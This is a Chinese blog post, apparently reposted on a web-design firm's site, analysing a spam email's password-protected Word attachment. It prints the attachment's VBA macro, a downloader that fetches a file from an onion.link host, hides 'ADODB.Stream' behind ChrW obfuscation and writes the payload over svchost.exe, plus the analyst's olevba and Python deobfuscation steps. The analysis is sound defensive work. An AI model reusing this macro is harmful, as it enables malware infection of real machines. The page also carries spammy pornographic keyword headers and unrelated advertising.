免费观看又色又爽又黄的小说免费_美女福利视频国产片_亚洲欧美精品_美国一级大黄大色毛片

一次垃圾郵件的分析

上周一(12月4號(hào)),朋友給我轉(zhuǎn)發(fā)了一封垃圾郵件,郵件里面附帶一個(gè)word文檔,我們倆都是搞信安,自然察覺(jué)一絲危險(xiǎn)的氣味,之前也沒(méi)有分析過(guò)word附件,因而有了今天的分析。

10年積累的網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)經(jīng)驗(yàn),可以快速應(yīng)對(duì)客戶(hù)對(duì)網(wǎng)站的新想法和需求。提供各種問(wèn)題對(duì)應(yīng)的解決方案。讓選擇我們的客戶(hù)得到更好、更有力的網(wǎng)絡(luò)服務(wù)。我雖然不認(rèn)識(shí)你,你也不認(rèn)識(shí)我。但先建設(shè)網(wǎng)站后付款的網(wǎng)站建設(shè)流程,更有二七免費(fèi)網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

  • 環(huán)境:ubuntu 16.04
  • office軟件: LibreOffice writer

1. FBI Warning

分析有風(fēng)險(xiǎn),請(qǐng)?jiān)谔摂M機(jī)上運(yùn)行;且在分析之前要禁止word的宏自動(dòng)運(yùn)行

2. 郵件截圖

一次垃圾郵件的分析

3. 郵件分析

可以看到郵件的正文內(nèi)容,是由一張圖片和一個(gè)附件組成,其中我們要重點(diǎn)關(guān)注的就是。

  • doc附件有密碼,且密碼為1115

4. 附件分析

一般分析方法

  • 4.1 一般來(lái)說(shuō),非打開(kāi)方式去分析一個(gè)word附件,我們一般會(huì)選擇oletools,但是這是在word文檔非加密的情況下,加了密碼后無(wú)法通過(guò)oletools來(lái)提取word文檔中的宏。
  • 4.2 olevba 提取宏展示

    olevba -c xxx.doc
    • -c: 只顯示word中的宏代碼
    • -a: 自動(dòng)分析word是否可疑
      一次垃圾郵件的分析

加了密碼后,就不能用一般的分析方法

  • 4.3 嘗試是用olevba來(lái)提取文檔的vba代碼
    一次垃圾郵件的分析
  • 4.4 關(guān)閉宏自動(dòng)運(yùn)行的前提下,打開(kāi)word附件。
    • 4.4.1 可以看到,word文檔需要密碼,當(dāng)你輸入完密碼后,就會(huì)自動(dòng)打開(kāi)文檔,如果你之前啟用了宏,那么當(dāng)你輸入完密碼后就會(huì)中招。
      一次垃圾郵件的分析
    • 4.4.2 打開(kāi)后,提示word文檔包含宏
      一次垃圾郵件的分析
    • 4.4.3 誘惑用戶(hù)啟用宏
      一次垃圾郵件的分析
  • 4.5 查看宏代碼
    可以看到這里存在一段vb編寫(xiě)的代碼,從調(diào)用WinHttpReq可以猜出來(lái),這一個(gè)word文檔的作用是一個(gè)下載器
    一次垃圾郵件的分析

  • 4.6 宏代碼分析
  • Step1. 訪(fǎng)問(wèn)暗網(wǎng)的某個(gè)網(wǎng)站下載一個(gè)文件,現(xiàn)在已經(jīng)無(wú)法打開(kāi)這個(gè)暗網(wǎng)的鏈接。
Sub Main
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")

WinHttpReq.Open "GET", "http://ypg7rfjvfywj7jhp.onion.link/icon.jpg", False, "username", "password"
WinHttpReq.send

如下圖,使用tor瀏覽器訪(fǎng)問(wèn)對(duì)應(yīng)的暗網(wǎng)鏈接,返回一個(gè)網(wǎng)頁(yè)來(lái)說(shuō)明該暗網(wǎng)地址已經(jīng)失效。
一次垃圾郵件的分析

  • Step2. 一個(gè)簡(jiǎn)單的混淆,拼湊出
    Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    second5 = ChrW(97) & ChrW(109)
    last5 = first5 + second5

    其中重要的部分就是first5和second5中的ChrW,ChrW是將十進(jìn)制的ascii值轉(zhuǎn)換為ascii字符,因而可以用python來(lái)做一個(gè)轉(zhuǎn)換。

first5 = "ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)"
second5 = "ChrW(97) & ChrW(109)"
def convert_vb2py(s):
    first_s = s.replace("ChrW","chr")
    second_s = first_s.replace("&","+")
    return second_s
print eval(convert_vb2py(first5))+eval(convert_vb2py(second5))

最終我們可以得到last5的值為ADODB.Stream,它是vb中一個(gè)對(duì)象,用來(lái)與文件系統(tǒng)操作
一次垃圾郵件的分析

  • Step 3. 保存http://ypg7rfjvfywj7jhp.onion.link/icon.jpg 到本地文件

    xyuhjnx = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Open
    oStream.Type = Val("1FFF")
    oStream.Write WinHttpReq.responseBody
    Dim first6 As String
    Dim last6 As String
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    oStream.SaveToFile Environ( "svchost.exe", Val("2FFF")
    oStream.Close
    End If
    End Sub

    代碼獲取icon.jpg的內(nèi)容,并創(chuàng)建一個(gè)Stream對(duì)象寫(xiě)入icon.jpg的內(nèi)容,然后保存到svchost.exe所在的目錄,也就是c:\windows\system32\目錄下,Val("2FFF")的值為2,在adobe.stream的SaveToFile方法中,第二個(gè)參數(shù)代表覆蓋原來(lái)的文件。

  • 4.7 到此,我們分析完整個(gè)宏代碼
    總的來(lái)說(shuō),這是一個(gè)downloader,下載惡意代碼并替換系統(tǒng)的svchost.exe。國(guó)外的一些安全研究者也上傳了去掉密碼后的文檔到惡意軟件分析網(wǎng)站,下面是其中的一個(gè)鏈接。

參考鏈接

  • 其它事件分析1
  • 惡意軟件分析網(wǎng)站分析結(jié)果
  • SaveToFIle參考

新聞名稱(chēng):一次垃圾郵件的分析
網(wǎng)頁(yè)鏈接:http://m.newbst.com/article22/gssccc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站制作企業(yè)網(wǎng)站制作企業(yè)建站網(wǎng)站內(nèi)鏈微信公眾號(hào)微信小程序

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話(huà):028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

h5響應(yīng)式網(wǎng)站建設(shè)